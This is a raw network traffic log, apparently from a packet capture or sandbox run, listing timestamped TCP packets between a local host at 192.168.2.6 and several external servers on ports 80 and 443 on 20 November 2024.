                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.913429022 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.913474083 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.913489103 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.913501978 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.913501978 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.913578033 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.914719105 CET44349974152.195.19.97192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.914733887 CET44349974152.195.19.97192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.914789915 CET44349974152.195.19.97192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.914805889 CET49974443192.168.2.6152.195.19.97
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.914853096 CET49974443192.168.2.6152.195.19.97
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.917191982 CET49974443192.168.2.6152.195.19.97
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.917203903 CET44349974152.195.19.97192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.918986082 CET44349977104.70.121.184192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.919368982 CET49977443192.168.2.6104.70.121.184
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.919387102 CET44349977104.70.121.184192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.921008110 CET44349976104.70.121.184192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.921272039 CET49976443192.168.2.6104.70.121.184
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.921288013 CET44349976104.70.121.184192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.922295094 CET44349977104.70.121.184192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.922352076 CET44349976104.70.121.184192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.922353983 CET49977443192.168.2.6104.70.121.184
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.922390938 CET49976443192.168.2.6104.70.121.184
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.924871922 CET49976443192.168.2.6104.70.121.184
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.924928904 CET44349976104.70.121.184192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.925374985 CET49977443192.168.2.6104.70.121.184
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.925483942 CET44349977104.70.121.184192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.926037073 CET4434996513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.926074982 CET4434996513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.926110029 CET4434996513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.926117897 CET49965443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.926132917 CET4434996513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.926160097 CET49965443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.926188946 CET49965443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.926192999 CET4434996513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.926206112 CET4434996513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.926255941 CET49965443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.931629896 CET49984443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.931648970 CET4434998413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.931941986 CET49984443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.934051037 CET49965443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.934067011 CET4434996513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.938287020 CET49984443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.938299894 CET4434998413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.942761898 CET4434997223.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.942791939 CET4434997223.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.942830086 CET49972443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.942845106 CET4434997223.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.942863941 CET49972443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.942883015 CET49972443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.943681002 CET4434997223.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.943706036 CET4434997223.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.943737984 CET49972443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.943749905 CET4434997223.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.943785906 CET49972443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.943881035 CET49972443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.943895102 CET4434997123.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.943923950 CET4434997123.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.943950891 CET49971443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.943958998 CET4434997123.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.943985939 CET49971443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.944003105 CET49971443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.944205999 CET4434997223.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.944266081 CET49972443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.945161104 CET4434997123.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.945184946 CET4434997123.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.945226908 CET49971443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.945230961 CET4434997123.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.945260048 CET49971443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.945301056 CET49971443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.945477962 CET4434997223.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.945501089 CET4434997223.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.945550919 CET49972443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.945561886 CET4434997223.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.945645094 CET49972443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.945646048 CET49972443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.946105003 CET4434997123.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.946146965 CET4434997123.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.946167946 CET49971443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.946171999 CET4434997123.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.946199894 CET49971443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.946223974 CET4434997123.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.946293116 CET49971443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.946507931 CET49971443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.946517944 CET4434997123.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.946660995 CET4434997223.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.946685076 CET4434997223.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.946754932 CET49972443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.946754932 CET49972443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.946772099 CET4434997223.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.946805000 CET49972443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.965509892 CET4434997013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.965583086 CET4434997013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.965693951 CET49970443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.967571020 CET49970443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.967571020 CET49970443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.967586040 CET4434997013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.967597008 CET4434997013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.971853018 CET49985443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.971884012 CET4434998513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.971955061 CET49985443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.972273111 CET49985443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.972299099 CET4434998513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.988023996 CET49977443192.168.2.6104.70.121.184
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.988039970 CET44349977104.70.121.184192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.993829012 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.993840933 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.993896961 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.993915081 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.993927002 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.993940115 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.993952036 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.993964911 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.993976116 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.993976116 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.993976116 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.994014025 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.994035959 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.994045973 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.994056940 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.994069099 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.994079113 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.994090080 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.994106054 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.994106054 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.994106054 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.994107008 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.994132996 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.994144917 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.994151115 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.994158030 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.994163990 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.994174957 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.994199038 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.994199038 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.994213104 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.994225979 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.994225979 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.994240046 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.994252920 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.994359970 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.994359970 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.994398117 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.994410038 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.994421959 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.994435072 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.994514942 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.994514942 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.994776011 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.994787931 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.994853973 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.994853973 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.994947910 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.995007038 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.995132923 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.995143890 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.995156050 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.995254040 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.995254040 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.995357990 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.995559931 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.995707989 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.995731115 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.995862961 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.996135950 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.996145964 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.996156931 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.996308088 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.996505022 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.996515989 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.996526957 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.996596098 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.996596098 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.996630907 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.996650934 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.996666908 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.996679068 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.996691942 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.996695995 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.996706963 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.996712923 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.996712923 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.996721983 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.996733904 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.996746063 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.996751070 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.996751070 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.996758938 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.996773005 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.996788979 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.996800900 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.996810913 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.996851921 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.996851921 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.996851921 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.996995926 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.997009039 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.997057915 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.997057915 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.997243881 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.997256041 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.997278929 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.997353077 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.997409105 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.997420073 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.997431993 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.997441053 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.997452021 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.997464895 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.997464895 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.997529030 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.997529030 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.997579098 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.997591019 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.997601032 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.997615099 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.997626066 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.997637033 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.997644901 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.997644901 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.997647047 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.997687101 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.997688055 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.008627892 CET4434996913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.008951902 CET4434996913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.009005070 CET4434996913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.009043932 CET49969443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.009082079 CET49969443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.009603024 CET4434997313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.009892941 CET4434997313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.010027885 CET49973443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.017308950 CET49969443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.017327070 CET4434996913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.017343044 CET49969443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.017349005 CET4434996913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.018393040 CET49973443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.018409967 CET4434997313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.018469095 CET49973443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.018476009 CET4434997313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.021316051 CET49976443192.168.2.6104.70.121.184
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.021337986 CET44349976104.70.121.184192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.025772095 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.025800943 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.025875092 CET49986443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.025881052 CET4434998613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.025948048 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.026149035 CET49986443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.026177883 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.026191950 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.027683020 CET49986443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.027693033 CET4434998613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.028168917 CET4434997223.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.028240919 CET49972443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.028250933 CET4434997223.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.028371096 CET4434997223.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.028492928 CET49972443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.028999090 CET49972443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.028999090 CET49972443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.029014111 CET4434997223.200.3.19192.168.2.6
